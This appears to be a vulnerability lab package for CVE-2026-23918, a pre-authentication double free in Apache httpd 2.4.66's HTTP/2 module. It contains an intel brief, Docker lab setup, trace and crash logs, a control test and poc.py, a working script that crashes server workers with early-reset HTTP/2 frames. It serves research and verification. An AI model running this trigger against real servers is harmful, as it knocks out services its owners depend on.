+  backported into 2.4.66 packages on 2026-01-23.

--- a/CVE-2026-23918/artifacts/trace-patched-single-spurge.txt
+++ b/CVE-2026-23918/artifacts/trace-patched-single-spurge.txt
@@ -1,0 +1,9 @@
+# httpd:2.4.67, mpm_event, h2c, LogLevel warn http2:trace2
+# identical trigger: 6 connections x 2 couples (12 streams)
+# 'move to spurge' lines: 12 (expect 12 = deduped)
+# child segfaults: 0 (expect 0)
+
+[Thu Aug 06 15:06:22.973840 2026] [http2:trace2] [pid 10:tid 99] h2_mplx.c(195): [client 192.168.65.1:41309] h2_stream(10-0-1,CLEANUP): cleanup, never started, move to spurge
+[Thu Aug 06 15:06:22.973917 2026] [http2:trace2] [pid 10:tid 99] h2_mplx.c(195): [client 192.168.65.1:41309] h2_stream(10-0-3,CLEANUP): cleanup, never started, move to spurge
+[Thu Aug 06 15:06:26.031349 2026] [http2:trace2] [pid 10:tid 103] h2_mplx.c(195): [client 192.168.65.1:40245] h2_stream(10-1-1,CLEANUP): cleanup, never started, move to spurge
+[Thu Aug 06 15:06:26.031436 2026] [http2:trace2] [pid 10:tid 103] h2_mplx.c(195): [client 192.168.65.1:40245] h2_stream(10-1-3,CLEANUP): cleanup, never started, move to spurge

--- a/CVE-2026-23918/artifacts/trace-vulnerable-double-spurge.txt
+++ b/CVE-2026-23918/artifacts/trace-vulnerable-double-spurge.txt
@@ -1,0 +1,15 @@
+# httpd:2.4.66, mpm_event, h2c, LogLevel warn http2:trace2
+# 6 trigger connections x 2 HEADERS+RST couples (12 streams)
+# 'move to spurge' lines: 24 (expect 24 = 12 streams x 2)
+# child segfaults: 6
+
+[Thu Aug 06 15:06:21.183029 2026] [http2:trace2] [pid 10:tid 109] h2_mplx.c(181): [client 192.168.65.1:51738] h2_stream(10-4-1,CLEANUP): cleanup, never started, move to spurge
+[Thu Aug 06 15:06:21.183048 2026] [http2:trace2] [pid 10:tid 109] h2_mplx.c(181): [client 192.168.65.1:51738] h2_stream(10-4-1,CLEANUP): cleanup, never started, move to spurge
+[Thu Aug 06 15:06:21.183117 2026] [http2:trace2] [pid 10:tid 109] h2_mplx.c(181): [client 192.168.65.1:51738] h2_stream(10-4-3,CLEANUP): cleanup, never started, move to spurge
+[Thu Aug 06 15:06:21.183137 2026] [http2:trace2] [pid 10:tid 109] h2_mplx.c(181): [client 192.168.65.1:51738] h2_stream(10-4-3,CLEANUP): cleanup, never started, move to spurge
+[Thu Aug 06 15:06:21.240823 2026] [http2:trace2] [pid 8:tid 94] h2_mplx.c(181): [client 192.168.65.1:36512] h2_stream(8-0-1,CLEANUP): cleanup, never started, move to spurge
+[Thu Aug 06 15:06:21.240845 2026] [http2:trace2] [pid 8:tid 94] h2_mplx.c(181): [client 192.168.65.1:36512] h2_stream(8-0-1,CLEANUP): cleanup, never started, move to spurge
+...
+[Thu Aug 06 15:06:21.739675 2026] [core:notice] [pid 1:tid 1] AH00052: child pid 8 exit signal Segmentation fault (11)
+[Thu Aug 06 15:06:21.740067 2026] [core:notice] [pid 1:tid 1] AH00052: child pid 9 exit signal Segmentation fault (11)
+[Thu Aug 06 15:06:21.740358 2026] [core:notice] [pid 1:tid 1] AH00052: child pid 10 exit signal Segmentation fault (11)

--- a/CVE-2026-23918/docker-compose.yml
+++ b/CVE-2026-23918/docker-compose.yml
@@ -1,0 +1,32 @@
+services:
+  # Vulnerable target: Apache httpd 2.4.66, mpm_event, HTTP/2 (h2c) on :80.
+  vulnerable:
+    build:
+      context: .
+      dockerfile: Dockerfile.vulnerable
+    image: cve-2026-23918-httpd:2.4.66
+    container_name: cve-2026-23918-vulnerable
+    ports:
+      - "8080:80"
+    healthcheck:
+      test: ["CMD-SHELL", "bash -c 'exec 3<>/dev/tcp/127.0.0.1/80'"]
+      interval: 5s
+      timeout: 3s
+      retries: 12
+      start_period: 5s
+
+  # Patched control target: Apache httpd 2.4.67, identical configuration.
+  patched:
+    build:
+      context: .
+      dockerfile: Dockerfile.patched
+    image: cve-2026-23918-httpd:2.4.67
+    container_name: cve-2026-23918-patched
+    ports:
+      - "8081:80"
+    healthcheck:
+      test: ["CMD-SHELL", "bash -c 'exec 3<>/dev/tcp/127.0.0.1/80'"]
+      interval: 5s
+      timeout: 3s
+      retries: 12
+      start_period: 5s

--- a/CVE-2026-23918/intel_brief.md
+++ b/CVE-2026-23918/intel_brief.md
@@ -1,0 +1,68 @@
+# Intel Brief — CVE-2026-23918
+
+## Identity
+
+- **CVE**: CVE-2026-23918
+- **Vendor**: Apache Software Foundation
+- **Product**: Apache HTTP Server (`httpd`), module `mod_http2` (upstream project `icing/mod_h2`)
+- **Ecosystem**: Web server / reverse proxy — one of the most widely deployed HTTP servers
+- **OS**: cross-platform; exploitation-relevant allocator behavior differs by build (see analysis)
+
+## Vulnerability Class
+
+- **CWE**: CWE-415 (Double Free); Red Hat additionally maps CWE-1341 (Multiple Releases of Same Resource or Handle)
+- **Mechanism**: A stream reset that arrives before the multiplexer has registered the stream ("early reset") causes `m_stream_cleanup()` to run twice for the same `h2_stream`, pushing the same pointer onto the `spurge` purge array twice. `c1_purge_streams()` then calls `h2_stream_destroy()` on both entries — the second on already-freed memory.
+- **Auth required**: No. Pre-authentication, protocol-level trigger.
+- **Trigger**: One HTTP/2 connection; `HEADERS` followed immediately by `RST_STREAM` (non-zero error code) on the same stream id. No race against the server required at the protocol level — back-to-back frames in one write suffice.
+
+## Severity
+
+- **CVSS**: 8.8 (High) per vendor/public advisories. Apache rates it "important"; Red Hat "Important" (heap-metadata corruption reachable pre-auth).
+- **Vendor description**: "Double Free and possible RCE vulnerability in Apache HTTP Server with the HTTP/2 protocol."
+- **EPSS**: Not checked at lab build time.
+- **KEV**: Not listed at lab build time (2026-08-06).
+- **Public exploitation**: Public crash-primitive PoC/detector exists (alt3kx `h2ghost.py`). A full RCE was developed under embargo by an independent reporter (per the mod_h2 maintainer) and a chain has been publicly described in research writeups; no public weaponized exploit at lab build time.
+
+## Versions
+
+- **Vulnerable**: Apache HTTP Server **2.4.66 only** (ships mod_h2 v2.0.36). Standalone mod_h2: v2.0.36.
+- **Bug introduced**: mod_h2 v2.0.36 reverted the per-stream memory allocator change from v2.0.33; the revert left all three `spurge` push sites in `h2_mplx.c` without deduplication. 2.4.66 (2025-12-04) is the only httpd release carrying v2.0.36.
+- **Fixed**: httpd 2.4.67 (2026-05-04) / mod_h2 v2.0.37 (2025-12-10) — `add_for_purge()` dedup + per-stream allocator restored (httpd r1930444).
+- **Not affected**: 2.4.65 and earlier; 2.4.67 and later (incl. current 2.4.68); any version running MPM `prefork` (the vulnerable c1/c2 threading model does not exist there); configurations without HTTP/2.
+- **Distro caveat**: Debian backported the fix into its 2.4.66 packages on 2026-01-23. A Debian/Ubuntu host reporting "2.4.66" may already be patched — check the package changelog, not the version string.
+
+## Vulnerable Surface
+
+- **Vulnerable file**: `modules/http2/h2_mplx.c` (httpd) / `mod_http2/h2_mplx.c` (mod_h2)
+- **Vulnerable functions**:
+  - `m_stream_cleanup()` — two of the three unguarded `APR_ARRAY_PUSH(m->spurge, ...)` sites ("c2 is done" and "never started" branches);
+  - `c1c2_stream_joined()` — the third push site (guarded elsewhere by an "already in spurge" check in `s_c2_done`, which the never-started path never reaches);
+  - `h2_mplx_c1_client_rst()` — the early-RST entry point ("very early RST, drop" branch) that drives the first cleanup;
+  - `c1_purge_streams()` — consumes `spurge`, destroying each entry; crashes on the duplicate at `h2_mplx.c:606` (`ap_assert(stream->state == H2_SS_CLEANUP)` read).
+- **Entrypoint**: HTTP/2 frame sequence on any h2/h2c listener — `on_frame_recv_cb` (RST) and `on_stream_close_cb` both funnel into `h2_mplx_c1_client_rst` → `m_stream_cleanup`.
+
+## Exploitation Prerequisites
+
+- Apache HTTP Server 2.4.66 (or standalone mod_h2 v2.0.36).
+- HTTP/2 enabled (`mod_http2` loaded; `Protocols` permitting h2 or h2c — common in default builds).
+- Threaded MPM (`event` — the default on modern installs — or `worker`). Not `prefork`.
+- Network reachability of the h2 endpoint. No credentials, no session, no headers.
+
+## Timeline (from public record)
+
+| Date | Event |
+|---|---|
+| 2025-12-04 | httpd 2.4.66 released (carries mod_h2 v2.0.36) |
+| 2025-12-09 | Double free reported on ASF Bugzilla (#69899) by Michal Arciszewski; patch supplied to reporters same day |
+| 2025-12-10 | mod_h2 v2.0.37 released with the fix; issue reported to the Apache security team |
+| 2025-12-11 | Fix applied to httpd trunk (r1930444) |
+| 2025-12-22 | Fix applied to the 2.4.x maintenance branch |
+| 2026-01-19 | CVE-2026-23918 assigned internally by Apache |
+| 2026-01-23 | Debian picks up the fix in its 2.4.66 packages |
+| 2026-05-04 | httpd 2.4.67 released; public advisory. Finders credited: Bartlomiej Dmitruk (Striga.ai), Stanislaw Strzalkowski (ISEC.pl) |
+| 2026-05-05 | Public writeups and crash-primitive PoC/detector (alt3kx) |
+| 2026-06-08 | httpd 2.4.68 released (current latest at lab build time; also fixes CVE-2026-48913, a separate mod_http2 UAF) |
+
+## Blockers
+
+None. Official vulnerable/patched container images are public, the fix diff is public, and the trigger is two frames on one connection. Full symbol/debug info is present in the official image binaries (confirmed during gdb analysis).

--- a/CVE-2026-23918/lab_build_report.md
+++ b/CVE-2026-23918/lab_build_report.md
@@ -1,0 +1,63 @@
+# Lab Build Report — CVE-2026-23918
+
+## Services
+
+| Service | Image | Host port | Role |
+|---|---|---|---|
+| `vulnerable` | `cve-2026-23918-httpd:2.4.66` (from `httpd:2.4.66`) | `8080 → 80` | Vulnerable target |
+| `patched` | `cve-2026-23918-httpd:2.4.67` (from `httpd:2.4.67`) | `8081 → 80` | Control target |
+
+Both Dockerfiles make a single config delta to the stock image — append to `/usr/local/apache2/conf/httpd.conf`:
+
+```
+LoadModule http2_module modules/mod_http2.so
+Protocols h2c http/1.1
+```
+
+Everything else is stock: default `mpm_event` (threaded — required precondition), default APR mmap allocator (the build variant public reporting ties to the RCE path), default static content. No TLS assets: cleartext h2c keeps the lab hermetic; the primitive is transport-independent.
+
+## Build and Runtime Notes
+
+- Base images are pulled from Docker Hub (`httpd:2.4.66`, `httpd:2.4.67`); digests recorded in `poc_verification_report.md`. Both carry full symbol/debug info (gdb source-level analysis works out of the box).
+- Image tooling: `bash` present (used by the healthcheck `exec 3<>/dev/tcp/127.0.0.1/80`); **no** `curl` or `python3` inside the images — run PoC/control from the host (Python 3 stdlib only).
+- Healthchecks are TCP-level only. A "healthy" container can still be crash-looping children during a trigger run — by design. Judge the target by its logs, not its healthcheck.
+- First build ≈ 1 min if base images are cached; `docker compose up -d --build`, both services healthy within seconds.
+
+## Optional: watch the double push (trace2)
+
+Append `LogLevel warn http2:trace2` to the same config file (or a compose build override), restart, then:
+
+```bash
+docker compose logs vulnerable 2>&1 | grep 'move to spurge'
+# vulnerable: each stream id appears TWICE (h2_mplx.c:181)
+# patched:    each stream id appears ONCE (h2_mplx.c:195, the add_for_purge guard)
+```
+
+`artifacts/trace-vulnerable-double-spurge.txt` and `artifacts/trace-patched-single-spurge.txt` are captured examples.
+
+## Optional: reproduce the gdb captures
+
+The images have no gdb; install at runtime (Debian repos reachable from the container):
+
+```bash
+docker exec <target> apt-get update -qq && docker exec <target> apt-get install -y -qq gdb
+```
+
+Two capture modes were used during analysis:
+
+1. **Crash capture** — run the whole server under gdb in single-process debug mode and let it die:
+   `gdb -batch -ex run -ex 'bt 30' -ex 'info registers' -ex 'x/8i $pc' --args /usr/local/apache2/bin/httpd -X -DFOREGROUND`
+   (gdb launches httpd as its own child, so no `SYS_PTRACE` capability is needed.)
+2. **Purge-loop breakpoint** — `artifacts/capture.gdb`: breakpoint at `h2_mplx.c:606` that dumps `*stream` per purge iteration (live object on iteration 0, `Cannot access memory` on iteration 1).
+
+Note on capture hygiene: gdb's stdio to a redirected file is block-buffered while httpd's error log writes are not, so interleaved text in one output file is not strictly chronological. In `-X` mode the process has no parent, so the fatal signal is not logged by anyone if the debugger has already exited — expect a log that simply stops.
+
+## Networking
+
+Bridge default; host ports 8080/8081 chosen to avoid collisions with common local services. The two targets share no volumes or state; `docker compose down -v` leaves nothing behind.
+
+## Known-Fragile Points
+
+- **Upstream tag drift**: Docker Hub `httpd:2.4.66`/`2.4.67` tags are historical and expected to remain; if they ever disappear, build from the Apache source tarball for the same versions instead.
+- **Healthcheck false-green**: see above — this is intentional, not a bug in the lab.
+- **apt-at-runtime for gdb**: requires outbound network from the container; if that is undesirable, pre-bake a debug image (`FROM cve-2026-23918-httpd:2.4.66` + `apt-get install gdb`).

--- a/CVE-2026-23918/poc/control_test.py
+++ b/CVE-2026-23918/poc/control_test.py
@@ -1,0 +1,187 @@
+#!/usr/bin/env python3
+"""
+control_test.py — control for the CVE-2026-23918 lab.
+
+Sends only WELL-FORMED HTTP/2 traffic against the target: complete GET
+requests read to END_STREAM, plus a *late* RST_STREAM (NO_ERROR) issued
+after the response has fully completed — an everyday, protocol-legal client
+pattern. It verifies every request is served and the server stays healthy.
+
+This isolates the PoC's effect: the crashes produced by poc.py come
+specifically from RST_STREAM with a non-zero error code arriving BEFORE the
+multiplexer has registered the stream ("early reset"), not from HTTP/2 or
+from resets in general. Expected result on BOTH the vulnerable (2.4.66) and
+patched (2.4.67) lab targets: CONTROL PASS, zero child crashes.
+
+Stdlib only. Python 3.8+.
+"""
+
+import argparse
+import socket
+import ssl
+import sys
+import time
+
+H2_PREFACE = b"PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n"
+T_DATA, T_HEADERS, T_RST, T_SETTINGS, T_PING = 0x0, 0x1, 0x3, 0x4, 0x6
+FLAG_END_STREAM, FLAG_ACK = 0x1, 0x1
+
+
+def frame(ftype, flags, sid, payload=b""):
+    return (len(payload).to_bytes(3, "big")
+            + bytes([ftype, flags])
+            + (sid & 0x7FFFFFFF).to_bytes(4, "big")
+            + payload)
+
+
+def _hpack_int(value, prefix_bits, first_byte):
+    limit = (1 << prefix_bits) - 1
+    if value < limit:
+        return bytes([first_byte | value])
+    out = bytearray([first_byte | limit])
+    value -= limit
+    while value >= 128:
+        out.append((value % 128) + 128)
+        value //= 128
+    out.append(value)
+    return bytes(out)
+
+
+def headers_get(sid, authority, scheme):
+    # static table: :method GET (2), :scheme http(s) (6/7), :path / (4)
+    block = b"\x82" + (b"\x87" if scheme == "https" else b"\x86") + b"\x84"
+    auth = authority.encode("idna")
+    block += b"\x01" + _hpack_int(len(auth), 7, 0x00) + auth
+    return frame(T_HEADERS, 0x5, sid, block)  # END_STREAM | END_HEADERS
+
+
+def recv_exact(sock, n, deadline):
+    buf = b""
+    while len(buf) < n:
+        if time.monotonic() > deadline:
+            raise TimeoutError("recv deadline")
+        chunk = sock.recv(n - len(buf))
+        if not chunk:
+            raise ConnectionError("EOF")
+        buf += chunk
+    return buf
+
+
+def read_until_end_stream(sock, sid, deadline):
+    """Read frames until END_STREAM on `sid`; ACK server SETTINGS."""
+    while time.monotonic() < deadline:
+        hdr = recv_exact(sock, 9, deadline)
+        ln = int.from_bytes(hdr[0:3], "big")
+        ftype, flags = hdr[3], hdr[4]
+        fsid = int.from_bytes(hdr[5:9], "big") & 0x7FFFFFFF
+        recv_exact(sock, ln, deadline)  # payload (discarded)
+        if ftype == T_SETTINGS and not (flags & FLAG_ACK):
+            sock.sendall(frame(T_SETTINGS, FLAG_ACK, 0))
+        if fsid == sid and (flags & FLAG_END_STREAM):
+            return True
+    raise TimeoutError("no END_STREAM")
+
+
+def open_h2(host, port, use_tls, timeout):
+    raw = socket.create_connection((host, port), timeout=timeout)
+    raw.settimeout(timeout)
+    if not use_tls:
+        return raw
+    ctx = ssl.create_default_context()
+    ctx.check_hostname = False
+    ctx.verify_mode = ssl.CERT_NONE
+    ctx.set_alpn_protocols(["h2"])
+    tls = ctx.wrap_socket(raw, server_hostname=host)
+    if tls.selected_alpn_protocol() != "h2":
+        tls.close()
+        return None
+    return tls
+
+
+def health_probe(host, port, use_tls, timeout):
+    try:
+        s = open_h2(host, port, use_tls, timeout)
+        if s is None:
+            return False
+        s.sendall(H2_PREFACE + frame(T_SETTINGS, 0, 0)
+                  + frame(T_PING, 0, 0, b"\x01" * 8))
+        deadline = time.monotonic() + timeout
+        while time.monotonic() < deadline:
+            hdr = recv_exact(s, 9, deadline)
+            ln = int.from_bytes(hdr[0:3], "big")
+            ftype, flags = hdr[3], hdr[4]
+            recv_exact(s, ln, deadline)
+            if ftype == T_SETTINGS and not (flags & FLAG_ACK):
+                s.sendall(frame(T_SETTINGS, FLAG_ACK, 0))
+            if ftype == T_PING and (flags & FLAG_ACK):
+                s.close()
+                return True
+    except (OSError, ssl.SSLError, TimeoutError):
+        pass
+    return False
+
+
+def main():
+    p = argparse.ArgumentParser(description=__doc__.splitlines()[0])
+    p.add_argument("target", help="host[:port] or http(s)://host[:port]")
+    p.add_argument("--iterations", type=int, default=25,
+                   help="well-formed request rounds (default 25)")
+    p.add_argument("--timeout", type=float, default=3.0)
+    args = p.parse_args()
+
+    target = args.target
+    if target.startswith("https://"):
+        use_tls, target = True, target[8:]
+    elif target.startswith("http://"):
+        use_tls, target = False, target[7:]
+    else:
+        use_tls = True
+    if ":" in target:
+        host, port = target.rsplit(":", 1)
+        port = int(port)
+    else:
+        host, port = target, (443 if use_tls else 80)
+    scheme = "https" if use_tls else "http"
+    authority = host if port in (80, 443) else f"{host}:{port}"
+
+    if not health_probe(host, port, use_tls, args.timeout):
+        sys.exit("[CONTROL FAIL] HTTP/2 not reachable — is the lab up?")
+
+    served = 0
+    for i in range(args.iterations):
+        s = open_h2(host, port, use_tls, args.timeout)
+        if s is None:
+            break
+        deadline = time.monotonic() + args.timeout
+        try:
+            s.sendall(H2_PREFACE + frame(T_SETTINGS, 0, 0)
+                      + headers_get(1, authority, scheme))
+            read_until_end_stream(s, 1, deadline)          # complete GET #1
+            s.sendall(headers_get(3, authority, scheme))
+            read_until_end_stream(s, 3, deadline)          # complete GET #2
+            # late reset of the already-completed stream: legal, harmless
+            s.sendall(frame(T_RST, 0, 3, (0x0).to_bytes(4, "big")))
+            served += 1
+        except (OSError, ssl.SSLError, TimeoutError):
+            pass
+        finally:
+            s.close()
+
+    healthy = health_probe(host, port, use_tls, args.timeout)
+    print(f"[*] {served}/{args.iterations} well-formed rounds served "
+          f"(2 GETs + late RST each); post-run health probe: "
+          f"{'OK' if healthy else 'FAILED'}")
+
+    if served == args.iterations and healthy:
+        print("[CONTROL PASS] Normal HTTP/2 traffic, including late "
+              "RST_STREAM, is served and leaves the server healthy. The "
+              "crash produced by poc.py is specific to the early-reset "
+              "double purge, not to HTTP/2 or resets in general.")
+        sys.exit(0)
+    print("[CONTROL FAIL] Well-formed traffic was not cleanly served — "
+          "check the lab state before trusting PoC results.")
+    sys.exit(1)
+
+
+if __name__ == "__main__":
+    main()

--- a/CVE-2026-23918/poc/poc.py
+++ b/CVE-2026-23918/poc/poc.py
@@ -1,0 +1,275 @@
+#!/usr/bin/env python3
+"""
+h2_early_reset_check.py — minimal *primitive* check for CVE-2026-23918
+(Apache httpd 2.4.66 mod_http2 early-reset double purge / double free).
+
+This is NOT an exploit. It sends the smallest frame sequence that exercises
+the vulnerable code path (HEADERS immediately followed by RST_STREAM with a
+non-zero error code, before the multiplexer registers the stream) and then
+looks for evidence that a server child process died (fresh-connection health
+probes + reconnect-latency shift). Ground truth is the target's own
+error_log; run this with log access whenever possible.
+
+AUTHORIZED USE ONLY. Every successful trigger kills a worker child process
+(this is a DoS against the target by design). Use only against systems you
+own or have written permission to test, preferably staging. Requires the
+explicit --i-am-authorized flag.
+
+Stdlib only. Python 3.8+.
+"""
+
+import argparse
+import socket
+import ssl
+import sys
+import time
+
+H2_PREFACE = b"PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n"
+
+# frame types
+T_HEADERS, T_RST, T_SETTINGS, T_PING, T_GOAWAY = 0x1, 0x3, 0x4, 0x6, 0x7
+
+
+# ---------- minimal HTTP/2 framing ----------
+
+def frame(ftype, flags, sid, payload=b""):
+    return (len(payload).to_bytes(3, "big")
+            + bytes([ftype, flags])
+            + (sid & 0x7FFFFFFF).to_bytes(4, "big")
+            + payload)
+
+
+def _hpack_int(value, prefix_bits, first_byte):
+    """RFC 7541 integer encoding, OR-ed into first_byte."""
+    limit = (1 << prefix_bits) - 1
+    if value < limit:
+        return bytes([first_byte | value])
+    out = bytearray([first_byte | limit])
+    value -= limit
+    while value >= 128:
+        out.append((value % 128) + 128)
+        value //= 128
+    out.append(value)
+    return bytes(out)
+
+
+def headers_frame(sid, authority, scheme):
+    # static table: :method GET (2), :scheme http(s) (6/7), :path / (4)
+    block = b"\x82" + (b"\x87" if scheme == "https" else b"\x86") + b"\x84"
+    # :authority as literal-without-indexing, indexed name 1
+    auth = authority.encode("idna") if isinstance(authority, str) else authority
+    block += b"\x01" + _hpack_int(len(auth), 7, 0x00) + auth
+    return frame(T_HEADERS, 0x5, sid, block)  # END_STREAM | END_HEADERS
+
+
+def rst_frame(sid, error=0x8):  # CANCEL (non-zero, per the bug description)
+    return frame(T_RST, 0x0, sid, error.to_bytes(4, "big"))
+
+
+def ping_frame(token=b"\xde\xad\xbe\xef\xca\xfe\xba\xbe"):
+    return frame(T_PING, 0x0, 0, token)
+
+
+def settings_frame():
+    return frame(T_SETTINGS, 0x0, 0, b"")
+
+
+def settings_ack():
+    return frame(T_SETTINGS, 0x1, 0, b"")
+
+
+# ---------- connection helpers ----------
+
+def open_h2(host, port, use_tls, timeout):
+    """Return a socket with HTTP/2 ready, or None if h2 unavailable."""
+    raw = socket.create_connection((host, port), timeout=timeout)
+    raw.settimeout(timeout)
+    if not use_tls:
+        return raw  # h2c with prior knowledge
+    ctx = ssl.create_default_context()
+    ctx.check_hostname = False
+    ctx.verify_mode = ssl.CERT_NONE
+    ctx.set_alpn_protocols(["h2"])
+    try:
+        tls = ctx.wrap_socket(raw, server_hostname=host)
+    except ssl.SSLError:
+        raw.close()
+        return None
+    if tls.selected_alpn_protocol() != "h2":
+        tls.close()
+        return None
+    return tls
+
+
+def _read_available(sock, deadline):
+    """Best-effort read; ACK server SETTINGS; True if a PING ACK arrived."""
+    got_ping_ack = False
+    while time.monotonic() < deadline:
+        try:
+            data = sock.recv(65535)
+        except (socket.timeout, ssl.SSLWantReadError):
+            break
+        except (ConnectionResetError, BrokenPipeError, ssl.SSLError, OSError):
+            break
+        if not data:
+            break  # EOF — normal on the trigger connection for both
+        i = 0
+        while i + 9 <= len(data):
+            ln = int.from_bytes(data[i:i + 3], "big")
+            ftype, flags = data[i + 3], data[i + 4]
+            body = data[i + 9:i + 9 + ln]
+            if ftype == T_SETTINGS and not (flags & 0x1):
+                try:
+                    sock.sendall(settings_ack())
+                except OSError:
+                    pass
+            if ftype == T_PING and (flags & 0x1):
+                got_ping_ack = True
+            if ftype == T_GOAWAY:
+                pass
+            i += 9 + ln
+        if got_ping_ack:
+            break
+    return got_ping_ack
+
+
+def health_probe(host, port, use_tls, timeout):
+    """Fresh connection: handshake + PING. Returns (ok, elapsed_ms)."""
+    t0 = time.monotonic()
+    try:
+        s = open_h2(host, port, use_tls, timeout)
+        if s is None:
+            return False, (time.monotonic() - t0) * 1000
+        s.sendall(H2_PREFACE + settings_frame() + ping_frame())
+        ok = _read_available(s, time.monotonic() + timeout)
+        s.close()
+        return ok, (time.monotonic() - t0) * 1000
+    except (OSError, ssl.SSLError):
+        return False, (time.monotonic() - t0) * 1000
+
+
+def send_trigger(host, port, use_tls, authority, scheme, pairs, timeout):
+    """One connection carrying `pairs` HEADERS+RST_STREAM couples, back-to-back.
+
+    The RST must reach the multiplexer before it has registered the stream;
+    sending everything in a single write right after the preface maximizes
+    that. Connection close afterwards is NORMAL on patched and unpatched
+    servers alike — it is not, by itself, a signal.
+    """
+    s = open_h2(host, port, use_tls, timeout)
+    if s is None:
+        return False
+    burst = bytearray(H2_PREFACE + settings_frame())
+    for k in range(pairs):
+        sid = 1 + 2 * k
+        burst += headers_frame(sid, authority, scheme)
+        burst += rst_frame(sid)
+    try:
+        s.sendall(bytes(burst))
+        _read_available(s, time.monotonic() + min(timeout, 0.75))
+    except (OSError, ssl.SSLError):
+        pass
+    finally:
+        s.close()
+    return True
+
+
+# ---------- main logic ----------
+
+def main():
+    p = argparse.ArgumentParser(
+        description="CVE-2026-23918 early-reset primitive check (crash detector, "
+                    "not an exploit). Authorized use only.")
+    p.add_argument("target", help="host[:port] or http(s)://host[:port]")
+    p.add_argument("--i-am-authorized", action="store_true",
+                   help="required: confirms you own / may test this target")
+    p.add_argument("--iterations", type=int, default=60,
+                   help="trigger connections to send (default 60)")
+    p.add_argument("--pairs", type=int, default=8,
+                   help="HEADERS+RST couples per connection (default 8)")
+    p.add_argument("--timeout", type=float, default=3.0)
+    p.add_argument("--crash-multiplier", type=float, default=1.5,
+                   help="reconnect-time ratio vs baseline to flag a crash")
+    p.add_argument("--crash-min-delta", type=float, default=100.0,
+                   help="min extra reconnect ms vs baseline to flag a crash")
+    args = p.parse_args()
+
+    if not args.i_am_authorized:
+        sys.exit("Refusing to run without --i-am-authorized. "
+                 "This trigger is a denial-of-service by design; only run it "
+                 "against systems you own or have written permission to test.")
+
+    target = args.target
+    if target.startswith("https://"):
+        use_tls, target = True, target[8:]
+    elif target.startswith("http://"):
+        use_tls, target = False, target[7:]
+    else:
+        use_tls = True
+    if ":" in target:
+        host, port = target.rsplit(":", 1)
+        port = int(port)
+    else:
+        host, port = target, (443 if use_tls else 80)
+    scheme = "https" if use_tls else "http"
+    authority = host if port in (80, 443) else f"{host}:{port}"
+
+    print(f"[*] Target {scheme}://{host}:{port} "
+          f"({'TLS+ALPN' if use_tls else 'h2c prior knowledge'})")
+
+    ok, _ = health_probe(host, port, use_tls, args.timeout)
+    if not ok:
+        sys.exit("[=] HTTP/2 not reachable (h2 disabled or not negotiated). "
+                 "The CVE-2026-23918 primitive requires HTTP/2 — nothing to test.")
+
+    base = [health_probe(host, port, use_tls, args.timeout)[1] for _ in range(3)]
+    base.sort()
+    baseline = base[1]
+    print(f"[*] Baseline fresh-connection health probe: {baseline:.0f} ms (median of 3)")
+
+    print(f"[!] Sending {args.iterations} trigger connections "
+          f"({args.pairs} HEADERS+RST couples each). "
+          f"This may kill worker children on a vulnerable server.")
+    sent = 0
+    for i in range(args.iterations):
+        if send_trigger(host, port, use_tls, authority, scheme,
+                        args.pairs, args.timeout):
+            sent += 1
+        if (i + 1) % 20 == 0:
+            print(f"    ... {i + 1}/{args.iterations}")
+        time.sleep(0.05)
+    print(f"[*] {sent}/{args.iterations} trigger connections sent")
+
+    time.sleep(1.0)
+    post = [health_probe(host, port, use_tls, args.timeout) for _ in range(3)]
+    fails = sum(1 for ok, _ in post if not ok)
+    slowest = max(ms for _, ms in post)
+    print(f"[*] Post-trigger probes: {fails}/3 failed, "
+          f"slowest {slowest:.0f} ms vs baseline {baseline:.0f} ms")
+
+    crashed = (fails >= 2
+               or (slowest > baseline * args.crash_multiplier
+                   and slowest > baseline + args.crash_min_delta))
+
+    print()
+    if crashed:
+        print("[VULNERABLE-BEHAVIOUR] Server health changed after the trigger: "
+              "consistent with a child process crash (double purge executed).")
+    else:
+        print("[NO CRASH OBSERVED] The primitive did not visibly fire. This is "
+              "expected on 2.4.67+/2.4.68, with MPM prefork, or with HTTP/2 "
+              "disabled — but it is NOT proof of safety: with the APR mmap "
+              "allocator (Debian/Docker) the double free can corrupt silently.")
+    print()
+    print("Ground truth on the server (you own it — check it):")
+    print("  grep -E 'double free|corruption|exit signal|segfault' "
+          "/var/log/{apache2,httpd}/error_log*")
+    print("Version facts that decide exposure regardless of this test:")
+    print("  httpd -v            # 2.4.66 = vulnerable window only")
+    print("  apache2ctl -M       # mpm_event/worker + http2_module required")
+    print("  Debian/Ubuntu: check the package changelog — the fix was")
+    print("  backported into 2.4.66 packages on 2026-01-23.")
+
+
+if __name__ == "__main__":
+    main()

--- a/CVE-2026-23918/poc_verification_report.md
+++ b/CVE-2026-23918/poc_verification_report.md
@@ -1,0 +1,86 @@
+# PoC Verification Report — CVE-2026-23918
+
+## Verdict
+
+`[SUCCESS]` — pre-authentication remote double free confirmed against Apache HTTP Server 2.4.66 at three independent evidence layers (server error log, `http2:trace2` stream-lifecycle trace, and gdb machine-state capture), with the patched 2.4.67 control remaining clean under identical input. Control traffic (well-formed HTTP/2, including late resets) passes on both builds.
+
+## Verification Model — Server-Side Ground Truth
+
+External behavior is deliberately **not** the success signal. The trigger connection closes normally on both vulnerable and patched builds, and a threaded MPM restarts dead children in about a second — remote probing alone can clear a vulnerable host that is actively crashing (observed: post-trigger health probes stayed green during a run that logged 60 child segfaults). Verification therefore uses, in order of authority:
+
+1. **Error log**: `AH00052 ... exit signal Segmentation fault (11)` and `AH10392: children are killed successively!` entries correlated with the trigger window.
+2. **trace2 lifecycle log** (`LogLevel warn http2:trace2`): the same stream id logged `cleanup, never started, move to spurge` twice consecutively (`h2_mplx.c:181` on 2.4.66) — the double push itself. On 2.4.67 the guard at `h2_mplx.c:195` logs each stream exactly once.
+3. **gdb capture**: the crash inside `c1_purge_streams()` and the live-vs-freed object dump (see `artifacts/`).
+
+Non-circularity note: signal 2 is emitted by the vulnerable code path itself at the moment of the defect; signal 3 is independent machine state. Neither depends on the PoC's own verdict logic.
+
+## Environment
+
+| Item | Value |
+|---|---|
+| Host | macOS arm64, Docker 29.6.1 |
+| Vulnerable image | `httpd:2.4.66` (`sha256:89a0b59e6d7285f00fc8df952a1579c31eb035cbdccb96690051e8bb6432cbea`) |
+| Patched image | `httpd:2.4.67` (`sha256:2a7deaaaf357261a1dffcb8fc725f4aaba2af95fbde1a40a68bca7cb0f03594e`) |
+| Config delta (both) | `LoadModule http2_module ...`, `Protocols h2c http/1.1` (default `mpm_event` retained) |
